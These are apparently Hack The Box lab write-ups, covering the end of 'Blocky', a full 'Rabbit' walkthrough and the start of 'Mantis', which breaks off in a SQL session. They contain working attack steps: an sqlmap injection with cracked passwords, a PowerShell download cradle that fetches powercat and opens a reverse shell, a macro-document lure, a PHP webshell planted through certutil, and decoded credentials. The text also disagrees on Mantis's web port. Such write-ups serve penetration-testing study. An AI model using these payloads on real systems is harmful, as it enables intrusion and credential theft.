Last login: Sun Dec 24 09:34:35 2017
notch@Blocky:~$ cat user.txt
59f*****3cd5

notch@Blocky:~$ sudo -l
[sudo] password for notch:8YsqfCTnvxAUeduzjNSXe22
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch@Blocky:~$ sudo su
root@Blocky:/home/notch# cd ..
root@Blocky:/home# cd ..
root@Blocky:/# cd root
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
0a9*****cd5f

Author: Jacco Straathof

HTB – Rabbit

Today we are going to solve another CTF challenge, “Rabbit”, which is categorized as a retired lab presented by Hack the Box for online penetration testing practice.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are accessible online, they have static IPs. The IP of Rabbit is 10.10.10.71, so let’s start with a basic nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.71
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-13 15:54 W. Europe Summer Time
Nmap scan report for 10.10.10.71
Host is up (0.032s latency).
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:36+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-13 18:55:06Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:33+00:00; +5h00m01s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:34+00:00; +5h00m01s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h00m01s, deviation: 0s, median: 5h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.84 seconds

Let’s enumerate the web server with Gobuster:

root@kali:~/htb/rabbit# gobuster -e -k -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.71:8080/
[+] Threads : 20
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded : true
[+] Timeout : 10s
=====================================================
2019/05/13 10:30:07 Starting gobuster
=====================================================
http://10.10.10.71:8080/index (Status: 200)
http://10.10.10.71:8080/Index (Status: 200)
http://10.10.10.71:8080/favicon (Status: 200)
http://10.10.10.71:8080/%!(NOVERB) (Status: 403)
http://10.10.10.71:8080/INDEX (Status: 200)
http://10.10.10.71:8080/joomla (Status: 301)
http://10.10.10.71:8080/*checkout* (Status: 403)
http://10.10.10.71:8080/complain (Status: 301)

We found a Complain Management System, so let’s check searchsploit for known issues:

root@kali:~/htb/rabbit# searchsploit 'complain management system'
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Complain Management System - Hard-Coded Credentials / Blind SQL injection | exploits/php/webapps/42968.txt
Complain Management System - SQL injection | exploits/php/webapps/41131.txt
root@kali:~/htb/rabbit# cat /usr/share/exploitdb/exploits/php/webapps/42968.txt 
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec 
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files


## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;

Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.

As the advisory describes, the application needs an authenticated session: we register as a 'Customer' (the hardcoded admin:admin123 also works), log in, and paste our PHPSESSID cookie into the captured request below, which we save as rabbit.req and hand to sqlmap:

c:\SQLMAP>type rabbit.req
POST /complain/process.php?action=assignComplain HTTP/1.1
Host: 10.10.10.71:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.71:8080/complain/view.php?mod=admin&view=viewByCompID&compId=10
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Connection: close
Cookie: PHPSESSID=82k6csju4c0ccdepcbnan5k602
Upgrade-Insecure-Requests: 1

compId=10&compDesc=&engId=6&btnLogin=+Assing+Complain+
c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r rabbit.req --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:49 /2019-05-15/

[15:16:49] [INFO] parsing HTTP request from 'rabbit.req'
[15:16:49] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[15:16:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:16:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:16:50] [INFO] testing if the target URL content is stable
[15:16:51] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL')
[15:16:51] [INFO] testing for SQL injection on POST parameter 'compId'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
--snip--
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[15:18:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'c:\SQLMAP\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[15:18:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[15:18:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:18:21] [INFO] starting 4 processes
[15:18:25] [INFO] cracked password 'barcelona' for user 'Malek'
[15:18:31] [INFO] cracked password 'popcorn' for user 'Dumah'
[15:18:32] [INFO] cracked password 'santiago' for user 'Moebius'
[15:18:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel'
Database: secret
Table: users
[10 entries]
+----------+--------------------------------------------------+
| Username | Password |
+----------+--------------------------------------------------+
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Dumah | 33da7a40473c1637f1a2e142f4925194 (popcorn) |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 (santiago) |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 (barcelona) |
+----------+--------------------------------------------------+

[15:19:04] [INFO] table 'secret.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.71\dump\secret\users.csv'
[15:19:04] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.10.71'

[*] ending @ 15:19:04 /2019-05-15/

Exploitation

Where can we use these credentials? Outlook Web Access is exposed at https://10.10.10.71/owa, so let's try there.

The pair that turns out to be valid is:

Ariel:pussycatdolls

Once logged in to /owa, the first thing to do is read the mailbox.

The emails suggest that a malicious OpenOffice document will get us a shell, but they also mention a PowerShell constraint and Windows Defender that we will have to work around. Metasploit has a module that generates such a document:

exploit/multi/misc/openoffice_document_macro

We rename the generated .odt to .zip, extract it and edit the macro, replacing the module's payload with a download cradle for powercat:

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

Because of the PowerShell constraint, we run it under the PowerShell v2 engine with -version 2, which does not enforce Constrained Language Mode:

powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

Send an email to all users with the malicious .odt attached. (Attaching files in Outlook Web Access still only works reliably from Internet Explorer, not Edge, Chrome or Firefox.)

Now we wait for a user to open it. This takes about 7 minutes; if nothing has happened after 10, reset the box.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
C:\Users\jacco>nc -lvp 1234
listening on [any] 1234 ...
10.10.10.71: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.71] 20231: NO_DATA
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>whoami
whoami
htb\raziel

c:\Users\Raziel\Desktop>type user.txt
type user.txt
c6f*****e9c

Post-Exploitation

c:\>dir wamp64
dir wamp64
Volume in drive C has no label.
Volume Serial Number is AEA8-5415

Directory of c:\wamp64

10/28/2017 11:13 AM <DIR> .
10/28/2017 11:13 AM <DIR> ..
10/28/2017 12:19 PM <DIR> alias
10/28/2017 11:13 AM <DIR> apps
12/31/2010 09:39 AM 4,790 barimage.bmp
10/28/2017 11:15 AM <DIR> bin
10/28/2017 11:13 AM <DIR> cgi-bin
01/08/2017 10:13 AM 28,470 images_off.bmp
01/08/2017 10:13 AM 28,470 images_on.bmp
09/01/2017 04:30 PM 3,978 install-english.txt
10/28/2017 11:13 AM <DIR> lang
11/06/2015 11:00 AM 8,156 license-english.txt
10/28/2017 11:18 AM <DIR> logs
09/01/2017 09:44 AM 5,741 mariadb_support_en.txt
09/01/2017 04:20 PM 1,289 read_after_install-english.txt
10/28/2017 11:13 AM <DIR> scripts
05/13/2019 12:44 PM <DIR> tmp
10/28/2017 11:16 AM 4,038,372 unins000.dat
10/28/2017 11:13 AM 1,401,105 unins000.exe
10/28/2017 11:13 AM 185 uninstall_services.bat
10/29/2017 10:32 PM 2,086 wampmanager.conf
09/03/2008 03:46 PM 1,233,408 wampmanager.exe
11/16/2017 07:57 PM 546,316 wampmanager.ini
08/30/2017 09:28 AM 29,431 wampmanager.tpl
05/13/2019 01:56 PM <DIR> www
14 File(s) 7,331,797 bytes
11 Dir(s) 25,699,479,552 bytes free

c:\>

We see that the web service on port 8080 is served by WampServer (c:\wamp64). Such a service sometimes runs as SYSTEM, so let's check whether we can write to its directory and, if so, find out who runs it:

c:\>cacls wamp64
cacls wamp64
c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA

CREATOR OWNER:(OI)(CI)(IO)(ID)F

c:\>
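Before dropping anything into the web root it is worth having a repeatable check for this condition. The following is an added example, not code from the write-up: a Python parser for cacls output that flags ACEs giving a low-privileged principal write access. The sample output is the c:\wamp64 listing above; the principal list and the set of rights treated as "write" are this example's own assumptions.

```python
"""Flag directory ACLs that let low-privileged users write.

Added example, not code from the write-up. It parses the output of the
Windows `cacls` command and reports ACEs that give a low-privileged
principal any write right. That is the condition that made the box
exploitable: BUILTIN\\Users can create files under the web root while
Apache runs as SYSTEM. SAMPLE_CACLS is copied from the write-up; the
principal and rights lists are this example's own choices.
"""
import re

# Principals any local or domain user can act as (extend for your environment).
LOW_PRIV = {
    r"BUILTIN\Users",
    r"Everyone",
    r"NT AUTHORITY\Authenticated Users",
    r"NT AUTHORITY\INTERACTIVE",
}
# cacls shorthand rights that include write: Full, Change, Write.
WRITE_SHORT = {"F", "C", "W"}
# Special-access rights that let a user add or alter content or take over the ACL.
WRITE_SPECIAL = {"FILE_WRITE_DATA", "FILE_APPEND_DATA", "DELETE", "WRITE_DAC", "WRITE_OWNER"}

# Copied from the write-up's `cacls wamp64` output.
SAMPLE_CACLS = r"""c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA

CREATOR OWNER:(OI)(CI)(IO)(ID)F
"""

PATH_PREFIX = re.compile(r"^[A-Za-z]:\\\S*\s+")              # "c:\wamp64 " on the first line
ACE_LINE = re.compile(r"^(?P<who>[^()]+?):(?P<rest>\(.*)$")  # "principal:(flags)right"


def parse_cacls(text):
    """Return a list of ACEs as {'who', 'flags', 'rights'} in cacls output order."""
    aces, current = [], None
    for raw in text.splitlines():
        line = PATH_PREFIX.sub("", raw.strip())
        if not line:
            current = None              # a blank line closes a "special access" block
            continue
        m = ACE_LINE.match(line)
        if m:
            flags = [f.rstrip(":") for f in re.findall(r"\(([^)]*)\)", m["rest"])]
            tail = m["rest"].rsplit(")", 1)[1].strip()   # shorthand right after the last ')'
            current = {"who": m["who"].strip(), "flags": flags,
                       "rights": {tail} if tail else set()}
            aces.append(current)
        elif current is not None:
            current["rights"].add(line)  # one named right per line under "special access"
    return aces


def weak_aces(aces):
    """ACEs in which a low-privileged principal has some form of write access."""
    return [a for a in aces
            if a["who"] in LOW_PRIV and a["rights"] & (WRITE_SHORT | WRITE_SPECIAL)]


def low_priv_can_write(text):
    """True if the cacls output shows a writable path for low-privileged users."""
    return bool(weak_aces(parse_cacls(text)))


if __name__ == "__main__":
    for ace in weak_aces(parse_cacls(SAMPLE_CACLS)):
        rights = " ".join(sorted(ace["rights"]))
        flags = "".join("(" + f + ")" for f in ace["flags"])
        print(f"{ace['who']:<30} {rights:<18} {flags}")
```

Pair it with a check of which account the Apache service actually runs under (sc qc <service> or tasklist /v): a writable web root plus a SYSTEM worker is the combination that turns a file drop into a SYSTEM shell. Note that icacls prints rights in a different form ((OI)(CI)(W) and friends), so this parser is for cacls output only.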

BUILTIN\Users has FILE_WRITE_DATA and FILE_APPEND_DATA on the directory, inherited by the www document root, so we can drop a PHP webshell there:

c:\Python37>type puckie.php
  <?php echo shell_exec($_GET["cmd"]); ?>
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
10.10.10.71 - - [13/May/2019 14:57:26] "GET /puckie.php HTTP/1.1" 200 -
c:\Users\Raziel\Desktop>certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
**** Online ****
0000 ...
002c
CertUtil: -URLCache command completed successfully.
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=whoami
  nt authority\system
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=type%20c:\users\administrator\desktop\root.txt
0b2*****d54

The webshell runs as NT AUTHORITY\SYSTEM, so we can read root.txt directly and could just as easily turn it into a full SYSTEM shell.

Author: Jacco Straathof

Reference used : https://ironhackers.es/en/writeups/writeup-rabbit-hackthebox/

HTB – Mantis

Today we are going to solve another CTF challenge, "Mantis", a retired lab presented by Hack the Box for online penetration-testing practice. The challenges in this lab are not easy without some penetration-testing knowledge. Let's start and learn how to analyse a vulnerability in a network and then exploit it to retrieve the desired information.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Mantis is 10.10.10.52 so let’s initiate with nmap port enumeration.

root@kali# nmap -sC -sV -oA nmap 10.10.10.52
# Nmap 7.70 scan initiated Tue May 7 13:08:49 2019 as: nmap -sC -sV -oA nmap 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.032s latency).
Not shown: 980 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-07 17:09:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-05-05T21:17:25
|_Not valid after: 2049-05-05T21:17:25
|_ssl-date: 2019-05-07T17:10:12+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 48m02s, deviation: 1h47m21s, median: 1s
| ms-sql-info: 
| 10.10.10.52:1433: 
| Version: 
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery: 
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2019-05-07T13:10:15-04:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2019-05-07 13:10:12
|_ start_date: 2019-05-05 17:15:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 13:11:40 2019 -- 1 IP address (1 host up) scanned in 170.33 seconds

The scan shows a lot of open ports: DNS, Kerberos, LDAP and SMB mark this host as the domain controller for htb.local, and it also runs Microsoft SQL Server 2014 Express and IIS.

First I browsed to port 1337, which only shows the default IIS7 page. With no clue there, the next step is directory brute-forcing: I used gobuster with directory-list-2.3-medium.txt against http://10.10.10.52:1337.

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 -o gobuster-mantis.log

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.52:1337/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/08 06:22:22 Starting gobuster
=====================================================
/secure_notes (Status: 301)

gobuster finds a single directory, /secure_notes.

It contains two files, a dev notes text file and web.config; the dev notes are the interesting one.

The notes describe setting up OrchardCMS on top of a SQL Server database "orcharddb" with a user "admin", so what we still need is that user's password. The file name itself is suspicious: dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt carries what looks like a base64-encoded token, so we will decode it once we have read the file.

root@kali:~/htb/mantis# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

The token in the file name decodes as base64:

root@kali:~/htb/mantis# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421

This looks like a hex string. Let’s convert it to ASCII:

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!

So the file name hides the SQL Server password, m$$ql_S@_P@ssW0rd!, for the admin user mentioned in the notes.
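As an added example (not part of the original write-up), a small Python decoder that peels both "secure formats" the dev notes use: the base64-wrapped hex in the file name, and the run of 0/1 digits the note labels as the OrchardCMS admin credentials, which the write-up never decodes. The two inputs are copied from the note; the function names and the layer-detection heuristic are this example's own.

```python
"""Peel the "secure format" layers used in the Mantis dev notes.

Added example, not code from the write-up. Two encodings appear in the
note: a run of 0/1 characters (8 bits per ASCII byte) for the OrchardCMS
admin credentials, and base64 wrapping a hex string in the dev_notes file
name for the SQL Server password. decode_layers() strips whichever layer
it recognises until plain text remains, so it handles either encoding and
any nesting of them. The two inputs are copied from the note; the
function names and the detection heuristic are this example's own.
"""
import base64
import binascii
import re
import string

ORCHARD_BLOB = "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001"
FILENAME_TOKEN = "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"

_TEXT = set(string.printable) - set("\x0b\x0c")


def is_text(data: bytes) -> bool:
    """True if data is non-empty printable ASCII (what a password should be)."""
    try:
        s = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return bool(s) and all(c in _TEXT for c in s)


def peel(layer: str):
    """Try the known encodings on one layer; return (name, decoded bytes) or None."""
    s = layer.strip()
    if re.fullmatch(r"[01]+", s) and len(s) % 8 == 0:      # ASCII written out as bits
        return "binary", int(s, 2).to_bytes(len(s) // 8, "big")
    if re.fullmatch(r"(?:[0-9a-fA-F]{2})+", s):           # before base64: hex also matches base64's alphabet
        return "hex", bytes.fromhex(s)
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:
        try:
            return "base64", base64.b64decode(s, validate=True)
        except binascii.Error:
            return None
    return None


def decode_layers(blob: str, max_depth: int = 5):
    """Return (list of layers removed, recovered text)."""
    layers, current = [], blob.strip()
    for _ in range(max_depth):
        hit = peel(current)
        if hit is None:
            break
        name, raw = hit
        if not is_text(raw):
            break                      # decoding produced binary junk: stop at the previous layer
        layers.append(name)
        current = raw.decode("ascii")
    return layers, current


if __name__ == "__main__":
    for label, blob in (("OrchardCMS admin", ORCHARD_BLOB), ("SQL Server (file name)", FILENAME_TOKEN)):
        layers, text = decode_layers(blob)
        print(f"{label}: {' -> '.join(layers)} -> {text}")
```

It stops as soon as no known layer applies or decoding would yield non-text, which keeps it from mangling a password that merely looks like hex; a password made only of hex digits that happens to decode to printable text could still be over-decoded, so read the reported layer list rather than trusting the last value blindly.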

Using impacket's mssqlclient.py we connect to the SQL Server on port 1433 with that credential:

root@kali:~/htb/mantis# ./mssqlclient.py htb.local/admin@10.10.10.52
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: m$$ql_S@_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> select @@version
Microsoft SQL Server 2014 - 12.0.2000.8 (X64) 
Feb 20 2014 20:04:26 
